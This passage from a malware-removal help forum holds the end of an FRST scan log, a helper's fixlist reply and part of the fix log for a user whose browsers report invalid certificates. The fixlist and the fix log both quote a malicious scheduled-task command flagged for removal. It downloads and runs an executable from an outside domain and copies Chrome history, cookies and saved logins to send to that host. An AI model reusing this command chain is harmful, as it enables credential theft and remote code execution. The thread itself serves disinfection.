Microsoft Sync Framework Runtime Native v1.0 (x86) (HKLM-x32\...\{8A74E887-8F0F-4017-AF53-CBA42211AAA5}) (Version: 1.0.1215.0 - Microsoft Corporation)
Microsoft Sync Framework Services Native v1.0 (x86) (HKLM-x32\...\{BD64AF4A-8C80-4152-AD77-FCDDF05208AB}) (Version: 1.0.1215.0 - Microsoft Corporation)
Nástroj pro odesílání služby Windows Live (HKLM-x32\...\{205C6BDD-7B73-42DE-8505-9A093F35A238}) (Version: 14.0.8014.1029 - Microsoft Corporation)
Trend Micro Internet Security (HKLM\...\{718D791F-F4E8-4aa7-98A6-15FDED17BDD0}) (Version: 17.50 - Trend Micro Inc.)
Trend Micro Internet Security (HKLM\...\{9D2B0322-44AE-460E-9283-4D2D7A9205AE}) (Version: 17.50 - Trend Micro Inc.) Hidden
USB 2.0 1.3M UVC WebCam (HKLM\...\USB 2.0 1.3M UVC WebCam) (Version: - )
VIA Platform Device Manager (HKLM-x32\...\InstallShield_{20D4A895-748C-4D88-871C-FDB1695B0169}) (Version: 1.34 - VIA Technologies, Inc.)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite_Wave3) (Version: 14.0.8050.1202 - Microsoft Corporation)
Windows Live Sync (HKLM-x32\...\{4B4451CE-D1E6-4BDE-B4B2-59F03BB83B7C}) (Version: 14.0.8050.1202 - Microsoft Corporation)
WinFlash (HKLM-x32\...\{8F21291E-0444-4B1D-B9F9-4370A73E346D}) (Version: 2.26.0 - ASUS)
WinRAR 6.02 (64-bit) (HKLM\...\WinRAR archiver) (Version: 6.02.0 - win.rar GmbH)
Wireless Console 3 (HKLM-x32\...\{20FDF948-C8ED-4543-A539-F7F4AEF5AFA2}) (Version: 3.0.10 - ASUS)

==================== Custom CLSID (Whitelisted): ==============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-1878501408-2484808434-785971923-1000_Classes\CLSID\{041F9391-C79D-44EE-AA4E-AF4E029C4B47}\InprocServer32 -> C:\Users\PC\AppData\Local\Google\Update\1.3.36.112\psuser_64.dll (Google LLC -> Google LLC)
CustomCLSID: HKU\S-1-5-21-1878501408-2484808434-785971923-1000_Classes\CLSID\{85D8EE2F-794F-41F0-BB03-49D56A23BEF4}\InprocServer32 -> C:\Users\PC\AppData\Local\Google\Update\1.3.36.112\psuser_64.dll (Google LLC -> Google LLC)
CustomCLSID: HKU\S-1-5-21-1878501408-2484808434-785971923-1000_Classes\CLSID\{8B480070-D37D-4090-A063-7A429F849652}\InprocServer32 -> C:\Users\PC\AppData\Local\Google\Update\1.3.36.92\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1878501408-2484808434-785971923-1000_Classes\CLSID\{A2C6CB58-C076-425C-ACB7-6D19D64428CD}\localserver32 -> C:\Users\PC\AppData\Local\Google\Chrome\Application\95.0.4638.54\notification_helper.exe (Google LLC -> Google LLC) [File not signed]
CustomCLSID: HKU\S-1-5-21-1878501408-2484808434-785971923-1000_Classes\CLSID\{BE5C2E39-090F-46A2-AFAA-47540743B4FE}\InprocServer32 -> C:\Users\PC\AppData\Local\Google\Update\1.3.36.102\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1878501408-2484808434-785971923-1000_Classes\CLSID\{CA8FA699-91CD-412F-9D13-9B1222F4370E}\InprocServer32 -> C:\Users\PC\AppData\Local\Google\Update\1.3.36.82\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1878501408-2484808434-785971923-1000_Classes\CLSID\{DEDF773D-E27B-485E-8E7D-85C5B0EB5A67}\InprocServer32 -> C:\Users\PC\AppData\Local\Google\Update\1.3.36.72\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1878501408-2484808434-785971923-1000_Classes\CLSID\{E8CF3E55-F919-49D9-ABC0-948E6CB34B9F}\InprocServer32 -> C:\Users\PC\AppData\Local\Google\Update\1.3.36.112\psuser_64.dll (Google LLC -> Google LLC)
ShellExecuteHooks-x32: Groove GFS Stub Execution Hook - {B5A7F190-DDA6-4420-B3BA-52453494E6CD} - C:\Program Files (x86)\Microsoft Office\Office12\GrooveShellExtensions.dll [2210608 2006-10-27] (Microsoft Corporation -> Microsoft Corporation)
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2021-06-11] (win.rar GmbH -> Alexander Roshal) [File not signed]
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2021-06-11] (win.rar GmbH -> Alexander Roshal) [File not signed]
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => C:\Windows\system32\igfxpph.dll [2009-07-03] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2021-06-11] (win.rar GmbH -> Alexander Roshal) [File not signed]
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2021-06-11] (win.rar GmbH -> Alexander Roshal) [File not signed]

==================== Codecs (Whitelisted) ====================

==================== Shortcuts & WMI ========================

==================== Loaded Modules (Whitelisted) =============

2009-10-06 11:31 - 2009-05-07 10:53 - 000379392 _____ () [File not signed] C:\Program Files (x86)\VIA\VIAudioi\VDeck\Dts2ApoApi64.dll
2009-10-06 11:31 - 2009-05-07 10:51 - 000071680 _____ () [File not signed] C:\Program Files (x86)\VIA\VIAudioi\VDeck\QsApoApi64.dll
2009-10-06 11:31 - 2009-07-06 08:37 - 047601664 _____ () [File not signed] C:\Program Files (x86)\VIA\VIAudioi\VDeck\Skin.dll
2009-10-06 11:31 - 2008-01-18 08:49 - 000098816 _____ () [File not signed] C:\Program Files (x86)\VIA\VIAudioi\VDeck\VMicApi.dll
2009-10-06 11:31 - 2007-03-10 03:58 - 000124416 _____ () [File not signed] C:\Program Files\ATKGFNEX\AGFNEX64.dll
2009-05-05 19:00 - 2009-05-05 19:00 - 000041472 _____ () [File not signed] C:\Program Files\P4G\DevMng.dll
2009-07-27 19:12 - 2009-07-27 19:12 - 000026624 _____ () [File not signed] C:\Program Files\P4G\OvrClk.dll
2009-10-06 11:33 - 2009-06-22 22:37 - 000212992 _____ () [File not signed] C:\Windows\SysWOW64\Fast Boot\GetBootTime.dll
2004-05-28 03:13 - 2004-05-28 03:13 - 000080384 _____ (ACTIONTEC Electronics,Inc) [File not signed] C:\Program Files (x86)\ASUS\Wireless Console 3\ATKWLIOC.DLL
2008-06-10 19:35 - 2008-06-10 19:35 - 000049152 _____ (ASUS) [File not signed] C:\Program Files (x86)\ASUS\ATK Media\ATKMETHOD.dll
2005-09-22 02:30 - 2005-09-22 02:30 - 000036864 _____ (ATK) [File not signed] C:\Program Files (x86)\ASUS\Wireless Console 3\inter_f2.dll
2009-08-22 11:02 - 2009-08-22 11:02 - 001652736 _____ (Microsoft Corporation) [File not signed] C:\Program Files\Trend Micro\Internet Security\MFC80U.DLL
2005-01-13 09:36 - 2005-01-13 09:36 - 000303104 _____ (Silicon Integrated Systems Corp.) [File not signed] C:\Program Files (x86)\ASUS\Wireless Console 3\SiSPkt.dll

==================== Alternate Data Streams (Whitelisted) ========

==================== Safe Mode (Whitelisted) ==================

==================== Association (Whitelisted) =================

==================== Internet Explorer (Version 8) (Whitelisted) ==========

HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp//go.microsoft.com/fwlink/?LinkId=69157
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp//go.microsoft.com/fwlink/?LinkId=69157
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp//go.microsoft.com/fwlink/?LinkId=54896
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp//go.microsoft.com/fwlink/?LinkId=54896
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp//go.microsoft.com/fwlink/?LinkId=69157
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp//go.microsoft.com/fwlink/?LinkId=69157
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp//go.microsoft.com/fwlink/?LinkId=54896
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp//go.microsoft.com/fwlink/?LinkId=54896
HKU\S-1-5-21-1878501408-2484808434-785971923-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp//asus.msn.com
HKU\S-1-5-21-1878501408-2484808434-785971923-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp//go.microsoft.com/fwlink/?LinkId=54896
HKU\S-1-5-21-1878501408-2484808434-785971923-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp//asus.msn.com
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp//www.bing.com/search?q={searchTerms}&FORM=IE8SRC
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp//www.bing.com/search?q={searchTerms}&FORM=IE8SRC
SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp//www.bing.com/search?q={searchTerms}&FORM=IE8SRC
SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp//www.bing.com/search?q={searchTerms}&FORM=IE8SRC
SearchScopes: HKU\S-1-5-21-1878501408-2484808434-785971923-1000 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp//www.bing.com/search?q={searchTerms}&src ... ORM=IE8SRC
SearchScopes: HKU\S-1-5-21-1878501408-2484808434-785971923-1000 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp//www.bing.com/search?q={searchTerms}&src ... ORM=IE8SRC
BHO: Windows Live Family Safety Browser Helper Class -> {4f3ed5cd-0726-42a9-87f5-d13f3d2976ac} -> C:\Program Files\Windows Live\Family Safety\fssbho.dll [2008-12-08] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll [2009-02-27] (Adobe Systems, Incorporated -> Adobe Systems Incorporated)
BHO-x32: Search Helper -> {6EBF7485-159F-4bff-A14F-B9E3AAC4465B} -> C:\Program Files (x86)\Microsoft\Search Enhancement Pack\Search Helper\SearchHelper.dll [2008-12-04] (Microsoft Corporation -> Microsoft Corp.)
BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office12\GrooveShellExtensions.dll [2006-10-27] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: Pomocník pro přihlášení ke službě Windows Live -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2008-11-18] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: Windows Live Toolbar Helper -> {E15A8DC0-8516-42A1-81EA-DC94EC1ACF10} -> C:\Program Files (x86)\Windows Live\Toolbar\wltcore.dll [2008-12-08] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: livecall - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files (x86)\Windows Live\Messenger\msgrapp.14.0.8050.1202.dll [2008-12-02] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: msnim - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files (x86)\Windows Live\Messenger\msgrapp.14.0.8050.1202.dll [2008-12-02] (Microsoft Corporation -> Microsoft Corporation)
Filter: deflate - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\system32\urlmon.dll [2009-07-14] (Microsoft Windows -> Microsoft Corporation)
Filter-x32: deflate - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\SysWOW64\urlmon.dll [2009-07-14] (Microsoft Windows -> Microsoft Corporation)
Filter: gzip - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\system32\urlmon.dll [2009-07-14] (Microsoft Windows -> Microsoft Corporation)
Filter-x32: gzip - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\SysWOW64\urlmon.dll [2009-07-14] (Microsoft Windows -> Microsoft Corporation)

==================== Hosts content: =========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-14 04:34 - 2009-06-10 23:00 - 000000824 _____ C:\Windows\system32\drivers\etc\hosts

==================== Other Areas ===========================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-1878501408-2484808434-785971923-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\PC\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 78.157.167.7 - 78.157.167.57
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

==================== FirewallRules (Whitelisted) ================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [{AD1925B9-10F2-4E15-B702-45B687BF9C5D}] => (Allow) C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{DDC37A15-CF76-4EE2-AC69-8F450DF3E551}] => (Allow) C:\Windows\system32\svchost.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{6AE3529A-4DCD-488F-9D52-F549C33A7685}] => (Allow) C:\Program Files (x86)\Windows Live\Sync\WindowsLiveSync.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [TCP Query User{A5FEFD13-E490-4420-B2FF-C2591F4D06D4}C:\users\pc\appdata\local\google\chrome\application\chrome.exe] => (Allow) C:\users\pc\appdata\local\google\chrome\application\chrome.exe (Google LLC -> Google LLC) [File not signed]
FirewallRules: [UDP Query User{6FAEB1BD-6225-4CA1-88A1-35422AEFDB14}C:\users\pc\appdata\local\google\chrome\application\chrome.exe] => (Allow) C:\users\pc\appdata\local\google\chrome\application\chrome.exe (Google LLC -> Google LLC) [File not signed]
FirewallRules: [TCP Query User{EA50643B-3BA1-42C9-8A94-29A298B813B1}C:\users\pc\appdata\local\google\chrome\application\chrome.exe] => (Block) C:\users\pc\appdata\local\google\chrome\application\chrome.exe (Google LLC -> Google LLC) [File not signed]
FirewallRules: [UDP Query User{4DD63112-DB4B-45D6-B2A8-E15EB604C55D}C:\users\pc\appdata\local\google\chrome\application\chrome.exe] => (Block) C:\users\pc\appdata\local\google\chrome\application\chrome.exe (Google LLC -> Google LLC) [File not signed]
FirewallRules: [{1E472D29-7705-4C3D-846D-190DB4FA8F87}] => (Allow) C:\Program Files\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC) [File not signed]

==================== Restore Points =========================

03-01-2021 19:32:13 Nainstalováno rozhraní DirectX
03-01-2021 19:42:38 Windows Update
05-07-2021 13:55:40 Removed 2007 Microsoft Office system
05-07-2021 14:30:59 Installed Microsoft Office Enterprise 2007
26-10-2021 17:59:44 AdwCleaner_BeforeCleaning_26/10/2021_17:59:43

==================== Faulty Device Manager Devices ============


==================== Event log errors: ========================

Application errors:
==================
Error: (10/26/2021 07:54:28 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 4107) (User: )
Description: Selhala extrakce kořenového seznamu jiného výrobce ze souboru CAB pro automatickou aktualizaci v: <http://www.download.windowsupdate.com/m ... ootstl.cab>. Došlo k chybě: Certifikační řetěz byl zpracován, ale byl ukončen v kořenovém certifikátu, který nemá důvěru zprostředkovatele důvěryhodnosti.
.

Error: (10/26/2021 07:54:28 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 4107) (User: )
Description: Selhala extrakce kořenového seznamu jiného výrobce ze souboru CAB pro automatickou aktualizaci v: <http://www.download.windowsupdate.com/m ... ootstl.cab>. Došlo k chybě: Certifikační řetěz byl zpracován, ale byl ukončen v kořenovém certifikátu, který nemá důvěru zprostředkovatele důvěryhodnosti.
.

Error: (10/26/2021 07:54:28 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 4107) (User: )
Description: Selhala extrakce kořenového seznamu jiného výrobce ze souboru CAB pro automatickou aktualizaci v: <http://www.download.windowsupdate.com/m ... ootstl.cab>. Došlo k chybě: Certifikační řetěz byl zpracován, ale byl ukončen v kořenovém certifikátu, který nemá důvěru zprostředkovatele důvěryhodnosti.
.

Error: (10/26/2021 07:54:28 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 4107) (User: )
Description: Selhala extrakce kořenového seznamu jiného výrobce ze souboru CAB pro automatickou aktualizaci v: <http://www.download.windowsupdate.com/m ... ootstl.cab>. Došlo k chybě: Certifikační řetěz byl zpracován, ale byl ukončen v kořenovém certifikátu, který nemá důvěru zprostředkovatele důvěryhodnosti.
.

Error: (10/26/2021 07:54:28 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 4107) (User: )
Description: Selhala extrakce kořenového seznamu jiného výrobce ze souboru CAB pro automatickou aktualizaci v: <http://www.download.windowsupdate.com/m ... ootstl.cab>. Došlo k chybě: Certifikační řetěz byl zpracován, ale byl ukončen v kořenovém certifikátu, který nemá důvěru zprostředkovatele důvěryhodnosti.
.

Error: (10/26/2021 07:54:28 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 4107) (User: )
Description: Selhala extrakce kořenového seznamu jiného výrobce ze souboru CAB pro automatickou aktualizaci v: <http://www.download.windowsupdate.com/m ... ootstl.cab>. Došlo k chybě: Certifikační řetěz byl zpracován, ale byl ukončen v kořenovém certifikátu, který nemá důvěru zprostředkovatele důvěryhodnosti.
.

Error: (10/26/2021 07:54:28 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 4107) (User: )
Description: Selhala extrakce kořenového seznamu jiného výrobce ze souboru CAB pro automatickou aktualizaci v: <http://www.download.windowsupdate.com/m ... ootstl.cab>. Došlo k chybě: Certifikační řetěz byl zpracován, ale byl ukončen v kořenovém certifikátu, který nemá důvěru zprostředkovatele důvěryhodnosti.
.

Error: (10/26/2021 07:54:28 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 4107) (User: )
Description: Selhala extrakce kořenového seznamu jiného výrobce ze souboru CAB pro automatickou aktualizaci v: <http://www.download.windowsupdate.com/m ... ootstl.cab>. Došlo k chybě: Certifikační řetěz byl zpracován, ale byl ukončen v kořenovém certifikátu, který nemá důvěru zprostředkovatele důvěryhodnosti.
.


System errors:
=============
Error: (10/26/2021 08:01:28 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: Server {BB6DF56B-CACE-11DC-9992-0019B93A3A84} se v daném časovém limitu neregistroval u služby DCOM.

Error: (10/26/2021 07:54:20 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: Byla přijata následující výstraha o závažné chybě: 70.

Error: (10/26/2021 07:54:20 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: Byla přijata následující výstraha o závažné chybě: 70.

Error: (10/26/2021 07:54:20 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: Byla přijata následující výstraha o závažné chybě: 70.

Error: (10/26/2021 06:55:42 PM) (Source: EventLog) (EventID: 6008) (User: )
Description: Předchozí vypnutí systému (18:23:36, ‎26.‎10.‎2021) bylo neočekávané.

Error: (10/26/2021 06:00:29 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Služba ASLDR Service byla neočekávaně ukončena. Tento stav nastal již 1krát.

Error: (10/26/2021 06:00:29 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Služba ATKGFNEX Service byla neočekávaně ukončena. Tento stav nastal již 1krát.

Error: (10/26/2021 06:00:29 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Služba Main Service byla neočekávaně ukončena. Tento stav nastal již 1krát.


==================== Memory info ===========================

BIOS: American Megatrends Inc. 212 08/26/2009
Motherboard: ASUSTeK Computer Inc. K50IJ
Processor: Pentium(R) Dual-Core CPU T4300 @ 2.10GHz
Percentage of memory in use: 72%
Total physical RAM: 4061.09 MB
Available physical RAM: 1134.52 MB
Total Virtual: 8120.32 MB
Available Virtual: 4981.81 MB

==================== Drives ================================

Drive c: (OS) (Fixed) (Total:149.05 GB) (Free:110.34 GB) NTFS ==>[drive with boot components (obtained from BCD)]
Drive d: (DATA) (Fixed) (Total:134.39 GB) (Free:65.13 GB) NTFS


==================== MBR & Partition Table ====================

==========================================================
Disk: 0 (MBR Code: Windows 7 or Vista) (Size: 298.1 GB) (Disk ID: D9B3496E)
Partition 1: (Not Active) - (Size=14.6 GB) - (Type=1C)
Partition 2: (Active) - (Size=149 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=134.4 GB) - (Type=0F Extended)

==================== End of Addition.txt =======================

Rudy
Site Admin
Posts: 118199
Registered: 30 Oct 2003 13:42
Location: Plzeň

Re: invalid certificates in browsers

#7 Post by Rudy »

Open Notepad and copy the following into it:
Start

CloseProcesses:
HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
Task: {2C093763-EE42-49CF-8891-F189A4AB542C} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1878501408-2484808434-785971923-1000Core => C:\Users\PC\AppData\Local\Google\Update\GoogleUpdate.exe [154440 2021-02-16] (Google LLC -> Google LLC)
Task: {326F35B1-9030-43D1-BD0D-5DBD49CECAFF} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156232 2021-10-25] (Google LLC -> Google LLC)
http://1oivviovidwopopin.info/f2/OSJPN1IXJW.exe -s -k -o "C:\Users\PC\AppData\Local\Temp\OSJPN1IXJW.exe" && cd C:\Users\PC\AppData\Local\Temp\ && "OSJPN1IXJW.exe" V04J2WGO4Hf2 DYY04N8UKN 1Q541DFWIX OEROW4YA69 & copy /Y /B "C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\History" "C:\Users\PC\AppData\Local\Temp\J1O2156BEB" > NUL && cd C:\Users\PC\AppData\Local\Temp\ && "C:\Users\PC\AppData\Local\Temp\OR0HXXB6JC.exe" -X POST -H "Content-type: application/octet-stream" --data @J1O2156BEB http://1oivviovidwopopin.info/h -> /C copy /Y /B "C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Cookies" "C:\Users\PC\AppData\Local\Temp\DYY04N8UKN" > NUL && copy /Y /B "C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\PC\AppData\Local\Temp\1Q541DFWIX" > NUL && copy /Y /B "C:\Users\PC\AppDa (the data entry has 678 more characters). <==== ATTENTION
Task: {74344F07-42C6-4622-9312-152A6B0AECFF} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1878501408-2484808434-785971923-1000UA => C:\Users\PC\AppData\Local\Google\Update\GoogleUpdate.exe [154440 2021-02-16] (Google LLC -> Google LLC)
Task: {FF6375C1-1AC9-466C-80D7-F1443D3F6986} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156232 2021-10-25] (Google LLC -> Google LLC)
U3 tmlwf; no ImagePath
U3 tmwfp; no ImagePath
C:\Windows\system32\Tasks\GoogleUpdateTaskMachineUA
C:\Windows\system32\Tasks\GoogleUpdateTaskMachineCore
CustomCLSID: HKU\S-1-5-21-1878501408-2484808434-785971923-1000_Classes\CLSID\{8B480070-D37D-4090-A063-7A429F849652}\InprocServer32 -> C:\Users\PC\AppData\Local\Google\Update\1.3.36.92\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1878501408-2484808434-785971923-1000_Classes\CLSID\{BE5C2E39-090F-46A2-AFAA-47540743B4FE}\InprocServer32 -> C:\Users\PC\AppData\Local\Google\Update\1.3.36.102\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1878501408-2484808434-785971923-1000_Classes\CLSID\{CA8FA699-91CD-412F-9D13-9B1222F4370E}\InprocServer32 -> C:\Users\PC\AppData\Local\Google\Update\1.3.36.82\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1878501408-2484808434-785971923-1000_Classes\CLSID\{DEDF773D-E27B-485E-8E7D-85C5B0EB5A67}\InprocServer32 -> C:\Users\PC\AppData\Local\Google\Update\1.3.36.72\psuser_64.dll => No File
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp//www.bing.com/search?q={searchTerms}&FORM=IE8SRC
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp//www.bing.com/search?q={searchTerms}&FORM=IE8SRC
SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp//www.bing.com/search?q={searchTerms}&FORM=IE8SRC
SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp//www.bing.com/search?q={searchTerms}&FORM=IE8SRC
SearchScopes: HKU\S-1-5-21-1878501408-2484808434-785971923-1000 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp//www.bing.com/search?q={searchTerms}&src ... ORM=IE8SRC
SearchScopes: HKU\S-1-5-21-1878501408-2484808434-785971923-1000 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp//www.bing.com/search?q={searchTerms}&src ... ORM=IE8SRC

EmptyTemp:
End
Save it to the desktop as fixlist.txt. Run FRST again and click >Fix<. When the action finishes, a log will appear; copy it here.
Post questions and logs only in your own threads. Private messages, ICQ and e-mails are not for solving your problems.

Please support our forum: https://platba.viry.cz/payment/.

e-mail: rudy(at)forum.viry.cz

Warning:
Before disinfecting your PC, back up your important data (mail, contacts, documents, photos, videos, music, etc.). Besides its "visible" activity, a virus can damage the system!


Once your problem is resolved, the thread will be locked. The same applies if it is inactive for more than 14 days. If you want to reactivate the thread, write to me at the e-mail address given above.

Eddydye
Visitor
Posts: 16
Registered: 27 May 2021 16:55

Re: invalid certificates in browsers

#8 Post by Eddydye »

Fix result of Farbar Recovery Scan Tool (x64) Version: 20-10-2021
Ran by PC (26-10-2021 21:09:59) Run:1
Running from C:\Users\PC\Desktop
Loaded Profiles: PC
Boot Mode: Normal
==============================================

fixlist content:
*****************
Start

CloseProcesses:
HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
Task: {2C093763-EE42-49CF-8891-F189A4AB542C} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1878501408-2484808434-785971923-1000Core => C:\Users\PC\AppData\Local\Google\Update\GoogleUpdate.exe [154440 2021-02-16] (Google LLC -> Google LLC)
Task: {326F35B1-9030-43D1-BD0D-5DBD49CECAFF} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156232 2021-10-25] (Google LLC -> Google LLC)
http://1oivviovidwopopin.info/f2/OSJPN1IXJW.exe -s -k -o "C:\Users\PC\AppData\Local\Temp\OSJPN1IXJW.exe" && cd C:\Users\PC\AppData\Local\Temp\ && "OSJPN1IXJW.exe" V04J2WGO4Hf2 DYY04N8UKN 1Q541DFWIX OEROW4YA69 & copy /Y /B "C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\History" "C:\Users\PC\AppData\Local\Temp\J1O2156BEB" > NUL && cd C:\Users\PC\AppData\Local\Temp\ && "C:\Users\PC\AppData\Local\Temp\OR0HXXB6JC.exe" -X POST -H "Content-type: application/octet-stream" --data @J1O2156BEB http://1oivviovidwopopin.info/h -> /C copy /Y /B "C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Cookies" "C:\Users\PC\AppData\Local\Temp\DYY04N8UKN" > NUL && copy /Y /B "C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\PC\AppData\Local\Temp\1Q541DFWIX" > NUL && copy /Y /B "C:\Users\PC\AppDa (the data entry has 678 more characters). <==== ATTENTION
Task: {74344F07-42C6-4622-9312-152A6B0AECFF} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1878501408-2484808434-785971923-1000UA => C:\Users\PC\AppData\Local\Google\Update\GoogleUpdate.exe [154440 2021-02-16] (Google LLC -> Google LLC)
Task: {FF6375C1-1AC9-466C-80D7-F1443D3F6986} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156232 2021-10-25] (Google LLC -> Google LLC)
U3 tmlwf; no ImagePath
U3 tmwfp; no ImagePath
C:\Windows\system32\Tasks\GoogleUpdateTaskMachineUA
C:\Windows\system32\Tasks\GoogleUpdateTaskMachineCore
CustomCLSID: HKU\S-1-5-21-1878501408-2484808434-785971923-1000_Classes\CLSID\{8B480070-D37D-4090-A063-7A429F849652}\InprocServer32 -> C:\Users\PC\AppData\Local\Google\Update\1.3.36.92\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1878501408-2484808434-785971923-1000_Classes\CLSID\{BE5C2E39-090F-46A2-AFAA-47540743B4FE}\InprocServer32 -> C:\Users\PC\AppData\Local\Google\Update\1.3.36.102\psuser_64.dll => No File
